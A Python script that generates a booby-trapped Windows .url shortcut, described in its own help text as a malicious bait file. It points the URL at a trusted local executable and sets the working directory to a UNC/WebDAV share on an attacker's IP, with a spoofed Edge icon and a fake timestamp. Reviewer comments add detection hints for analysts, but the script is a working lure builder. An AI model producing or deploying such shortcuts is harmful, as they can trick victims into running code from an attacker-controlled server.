import argparse
def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
    """Write a Windows ``[InternetShortcut]`` (.url) file to *output_file*.

    The file is a small INI document with one section and six keys, emitted
    in this order: URL, WorkingDirectory, ShowCommand, IconIndex, IconFile,
    Modified. Values are written verbatim; nothing is validated or escaped.

    Args:
        output_file: Path of the file to create (overwritten if it exists).
        url_target: Value for the ``URL`` key.
        working_directory: Value for the ``WorkingDirectory`` key.
        icon_file: Value for the ``IconFile`` key.
        icon_index: Value for the ``IconIndex`` key.
        modified: Value for the ``Modified`` key.

    NOTE(review): for analysts, the artifact to look for is the combination
    this function emits -- an InternetShortcut whose ``URL`` names a local
    executable while ``WorkingDirectory`` is supplied separately (the caller
    in this file passes a remote UNC path). Flagging .url files whose
    WorkingDirectory is a UNC/remote location is a reasonable triage rule.
    """
    # ShowCommand is hard-coded to 7; presumably the "start minimized"
    # window state -- confirm against the shortcut format documentation.
    entries = (
        ("URL", url_target),
        ("WorkingDirectory", working_directory),
        ("ShowCommand", 7),
        ("IconIndex", icon_index),
        ("IconFile", icon_file),
        ("Modified", modified),
    )

    rendered = ["[InternetShortcut]"]
    rendered.extend(f"{key}={value}" for key, value in entries)
    # Every line, including the last, is newline-terminated.
    document = "\n".join(rendered) + "\n"

    with open(output_file, "w", encoding="utf-8") as handle:
        handle.write(document)

    print(f"[+] .url file created: {output_file}")
def main():
    """Parse command-line options and write the .url file.

    Options: ``--out`` (output name), ``--ip`` (required; host used in the
    UNC path), ``--share`` (share name), ``--exe`` (value for the URL key),
    ``--icon`` / ``--index`` (icon file and index) and ``--modified`` (value
    for the Modified key). The UNC working directory is assembled from
    ``--ip`` and ``--share`` and everything is handed to
    ``generate_url_file``.

    NOTE(review): with default options the output always carries the same
    literal URL, IconFile, IconIndex and Modified values shown below; those
    constants are usable as static indicators when hunting for files made
    with an unmodified copy of this script.
    """
    cli = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")

    cli.add_argument('--out', default="bait.url", help="Output .url file name")
    cli.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
    cli.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
    cli.add_argument(
        '--exe',
        default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
        help="Target executable path on victim machine",
    )
    cli.add_argument(
        '--icon',
        default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
        help="Icon file path",
    )
    cli.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
    cli.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")

    opts = cli.parse_args()

    # The raw f-string yields \\<ip>\<share>\\ -- note the two trailing
    # backslashes; presumably intentional, confirm before changing.
    unc_directory = fr"\\{opts.ip}\{opts.share}\\"

    generate_url_file(
        opts.out,
        opts.exe,
        unc_directory,
        opts.icon,
        opts.index,
        opts.modified,
    )
# Run the CLI only when executed as a script, not when imported.
if __name__ == "__main__":
    main()